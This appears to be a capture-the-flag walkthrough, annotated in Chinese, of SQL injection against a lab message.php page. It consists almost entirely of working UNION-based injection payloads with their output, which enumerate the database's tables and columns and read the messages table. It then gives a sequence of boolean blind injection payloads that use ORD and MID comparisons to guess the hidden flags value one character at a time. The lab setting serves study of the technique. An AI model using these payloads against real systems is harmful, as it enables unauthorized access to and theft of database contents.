Message #-7713 UNION ALL SELECT NULL,CONCAT(0x7173636371,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x697367)#: qsccq2qousq
存在两个表
1
Message #-3380 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(table_name AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x697367) LIMIT 0,1)#: qsccqflagsqousq
存在flags表
1
Message #-8854 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(table_name AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x697367) LIMIT 1,1)#: qsccqmessagesqousq
存在messages表
1
Message #-8145 UNION ALL SELECT NULL,CONCAT(0x7173636371,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d65737361676573 AND table_schema=0x697367#: qsccq2qousq
messages表有两行记录
1
Message #-2023 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(column_name AS CHAR),0x20),0x70767673756c,IFNULL(CAST(column_type AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6d65737361676573 AND table_schema=0x697367 LIMIT 1,1)#: qsccqvaluepvvsultinytextqousq
messages表列名是value,类型是tinytext
1
Message #-8873 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(`value` AS CHAR),0x20),0x716f757371) FROM isg.messages ORDER BY `value` LIMIT 0,1)#: qsccqThe quick brown fox jumps over the lazy dogqousq
isg.messages中内容为:The quick brown fox jumps over the lazy
1
Message #-2064 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(column_name AS CHAR),0x20),0x70767673756c,IFNULL(CAST(column_type AS CHAR),0x20),0x716f757371) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x666c616773 AND table_schema=0x697367 LIMIT 1,1)#: qsccqvaluepvvsultinytextqousq
flags表列名为value,类型tinytext
1
Message #-3413 UNION ALL SELECT NULL,CONCAT(0x7173636371,IFNULL(CAST(COUNT(`value`) AS CHAR),0x20),0x716f757371) FROM isg.flags#: qsccq1qousq
flags有一行记录
1
http://10.0.0.201/message.php?id=-3324 UNION ALL SELECT NULL,(SELECT CONCAT(0x7173636371,IFNULL(CAST(`value` AS CHAR),0x20),0x716f757371) FROM isg.flags ORDER BY `value` LIMIT 0,1)#
直接查询flags表,没有返回结果。后面采用单字符猜测
MID()函数取第一个字符,MID(text,1,1),从第一个字符开始取一个字符
ORD把字符转换成ASCII码
根据ASCII码比较大小猜测是什么字符,比如下面是猜第一个字符,有The quick brown fox jumps over the lazy dog说明猜对了
1
2
3
4
5
6
7
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>64: The quick brown fox jumps over the lazy dog
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>96:
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>80:
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>72: The quick brown fox jumps over the lazy dog
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>76:
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>74:
Message #1 AND ORD(MID((SELECT IFNULL(CAST(`value` AS CHAR),0x20) FROM isg.flags ORDER BY `value` LIMIT 0,1),1,1))>73:
